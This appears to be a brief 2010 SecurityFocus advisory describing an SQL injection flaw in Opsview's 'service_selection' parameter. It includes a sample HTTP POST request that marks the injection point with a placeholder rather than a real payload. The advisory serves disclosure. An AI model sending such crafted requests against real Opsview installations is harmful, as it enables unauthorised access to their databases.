Opsview 'service_selection' Parameter SQL Injection Vulnerability

An attacker can exploit this issue using a web browser.

The following example data is available:

POST /status/service/acknowledge HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

comment=&from=http%3a%2f%2f10.20.30.68%2fstatus%2fhostgroup&notify=1&service_selection=%24%7dsql injection goes here%7d&submit=Submit


 

Privacy Statement
Copyright 2010, SecurityFocus